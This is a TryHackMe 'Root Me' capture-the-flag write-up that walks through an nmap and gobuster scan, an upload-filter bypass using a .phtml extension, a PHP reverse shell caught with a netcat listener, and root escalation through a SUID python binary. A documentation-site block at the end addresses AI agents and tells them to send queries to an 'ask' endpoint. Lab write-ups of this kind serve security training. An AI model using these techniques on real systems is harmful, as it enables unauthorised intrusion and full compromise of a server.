# Root Me **Date :** 8th November, 2021 **Author :** Dhaval Kotak **Room :** [Root Me](https://tryhackme.com/room/rrootme) ## Reconnaissance ```shell nanomite @ zeus in ~/thm/rootme ⚡️ nmap -A 10.10.237.244 | tee nmap.log Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 22:47 IST Nmap scan report for 10.10.237.244 Host is up (0.40s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA) |_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: HackIT - Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.96 seconds ``` Scan the machine, how many ports are open? **2** What version of Apache is running? **2.4.29** What service is running on port 22? **ssh** Find directories on the web server using the GoBuster tool. ```shell nanomite @ zeus in ~/thm/rootme ⚡️ gobuster dir -u http://10.10.237.244 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.237.244 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/11/08 22:50:57 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /css (Status: 301) [Size: 312] [--> http://10.10.237.244/css/] /index.php (Status: 200) [Size: 616] /js (Status: 301) [Size: 311] [--> http://10.10.237.244/js/] /panel (Status: 301) [Size: 314] [--> http://10.10.237.244/panel/] /server-status (Status: 403) [Size: 278] /uploads (Status: 301) [Size: 316] [--> http://10.10.237.244/uploads/] =============================================================== 2021/11/08 22:54:38 Finished =============================================================== ``` What is the hidden directory? **/panel/** ## **Getting A Shell** First, visit `http://IP_ADDR/panel/` The website does not allow uploading files with `.php` extension. So I tried some other extension for php files and .phtml seems to be working. So upload a reverse shell file on the form. Open up a netcat listener on your machine : `nc -vlnp 1234` Now, visit `http://IP_ADDR/php-rev-shell.phtml` ```shell nanomite @ zeus in ~/thm/rootme ⚡️ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.17.2.15] from (UNKNOWN) [10.10.237.244] 36914 Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Mon Nov 8 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 19:51:37 up 22 min, 0 users, load average: 0.00, 0.26, 1.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: cant access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash")' $ ^Z [1]+ Stopped nc -lvnp 1234 nanomite @ zeus in ~/thm/rootme ⚡️ stty raw -echo; fg nc -lvnp 1234 www-data@rootme:/$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` user.txt ```shell $ www-data@rootme:/$ find / -type f -name "user.txt" 2>/dev/null /var/www/user.txt www-data@rootme:/$ cat /var/www/user.txt THM{REDACTED} ``` ## **Privilege Escalation** Now that we have a shell, let's escalate our privileges to root. Search for files with SUID permission, which file is weird? ```shell $ find / -perm -u=s -type f 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/traceroute6.iputils /usr/bin/newuidmap /usr/bin/newgidmap /usr/bin/chsh /usr/bin/python /usr/bin/at /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/bin/newgrp /usr/bin/passwd /usr/bin/pkexec /snap/core/8268/bin/mount /snap/core/8268/bin/ping /snap/core/8268/bin/ping6 /snap/core/8268/bin/su /snap/core/8268/bin/umount /snap/core/8268/usr/bin/chfn /snap/core/8268/usr/bin/chsh /snap/core/8268/usr/bin/gpasswd /snap/core/8268/usr/bin/newgrp /snap/core/8268/usr/bin/passwd /snap/core/8268/usr/bin/sudo /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/8268/usr/lib/openssh/ssh-keysign /snap/core/8268/usr/lib/snapd/snap-confine /snap/core/8268/usr/sbin/pppd /snap/core/9665/bin/mount /snap/core/9665/bin/ping /snap/core/9665/bin/ping6 /snap/core/9665/bin/su /snap/core/9665/bin/umount /snap/core/9665/usr/bin/chfn /snap/core/9665/usr/bin/chsh /snap/core/9665/usr/bin/gpasswd /snap/core/9665/usr/bin/newgrp /snap/core/9665/usr/bin/passwd /snap/core/9665/usr/bin/sudo /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/9665/usr/lib/openssh/ssh-keysign /snap/core/9665/usr/lib/snapd/snap-confine /snap/core/9665/usr/sbin/pppd /bin/mount /bin/su /bin/fusermount /bin/ping /bin/umount ``` **/usr/bin/python** Find the exploit for the binary on [GTFObins](https://gtfobins.github.io/gtfobins/python/) ```shell www-data@rootme:/$ python -c 'import os; os.setuid(0); os.system("/bin/sh")' # id uid=0(root) gid=33(www-data) groups=33(www-data) # whoami root ``` root.txt ```shell # cd /root # ls root.txt # cat root.txt THM{REDACTED} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dhaval-kotak.gitbook.io/ctfs/root-me.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.